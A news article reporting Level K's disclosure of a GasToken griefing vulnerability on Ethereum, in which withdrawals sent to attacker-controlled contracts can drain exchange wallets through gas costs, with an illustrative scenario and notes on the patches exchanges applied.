Level K, the DApp and Ethereum Smart contract developer, recently discovered that there is a vulnerability on the Ethereum blockchain that allows hackers to mint GasTokens in large amounts when receiving ETH. The information was published on the 21st of November. According to the company, exchanges that are at risk of this attack have been notified. They have made some software amendments that would prevent such an attack assuming a bad actor tries to launch one.
GasToken Vulnerability On Ethereum’s Blockchain
According to the report, the window of vulnerability appears when ether is sent to an address that is able to carry out arbitrary computations that have been paid for by the originator of the transaction. This comes with a risk of griefing. Griefing occurs when a bad actor is designed to damage the network. Theoretically, attackers will be able to fool transaction originators like exchanges for an amount of their choosing if there are no gas limit protection packages in place.
Minting a variety of GasTokens at the same time the attacker is receiving ETH, would make it possible for the attacker to profit from this situation.
The report states that the risk of minting is not limited to ETH alone. Other Ethereum-based tokens like ERC-20 and ERC-721 can be affected. During contract calls, that are made to activate contracts, exchanges that don’t have gas limit for their transactions may end up paying more than they should for computation to the benefit of the attacker.
Part of the report stated a hypothetical case study which is as follows:
“In an exploit scenario, Alice runs a cryptocurrency exchange and Bob has plans to cause Alice harm. Bob can easily initiate withdrawals sending them to a contract address that is under his control. This address will rely on a computationally fallback function which is usually intensive. If Alice doesn’t set a gas limit, she will end up paying transaction fees from her wallet. Bob, with enough transactions, can drain the funds from Alice’s wallet. If Alice doesn’t have a KYC policy, Bob will be able to create several accounts and circumvent the withdrawal limits of single accounts. Also, Bob can mint GasTokens using his fallback function if he wants to make a profit while draining Alice’s wallet.”
Level K states that all the exchanges that may be affected by this attack have been privately notified and encouraged to take precautions against possible attacks. They sent this notification to as many cryptocurrency exchanges as possible. These exchanges have implemented the patches. Since the first report reached the public, Level K has published more information about the vulnerability as well as the actions that can be taken to contain it.